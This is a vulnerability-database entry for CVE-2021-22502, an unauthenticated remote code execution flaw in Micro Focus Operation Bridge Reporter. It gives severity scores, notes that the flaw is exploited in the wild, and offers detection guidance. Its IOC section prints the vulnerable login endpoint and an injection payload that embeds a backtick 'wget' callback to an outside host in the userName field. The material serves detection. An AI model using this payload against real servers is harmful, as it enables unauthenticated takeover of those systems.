cbcvebase.
CVE-2021-22502
published 2021-02-08

CVE-2021-22502: Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
96.74%
99.9th percentile
Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.

Affected

1 ranges
VendorProductVersion rangeFixed in
microfocusoperation_bridge_reporter

Detection & IOCsextracted from sources · hover to see the quote

url/AdminService/urest/v1/LogonResource
command{"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}
  • Look for POST requests to /AdminService/urest/v1/LogonResource with backtick-enclosed shell commands embedded in the 'userName' JSON field — this is the injection point and requires no authentication.
  • The server returns HTTP 401 with body containing 'An error occurred' and 'AUTHENTICATION_FAILED' even on a successful injection attempt — a 401 response does NOT rule out exploitation.
  • The injection occurs at the login endpoint before authentication; monitor for shell metacharacters (backticks, $(), pipes) inside the 'userName' field of JSON bodies sent to the LogonResource endpoint.
  • Response Content-Type header will be 'application/json' — use this alongside the 401 status and error body strings to fingerprint exploitation attempts.
  • ·Vulnerability affects OBR version 10.40 and below; older versions may also be affected — confirm exact version scope before scoping detection.
  • ·The Metasploit module and Nuclei template were tested specifically on the Linux 10.40 version; Windows deployments may behave differently.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.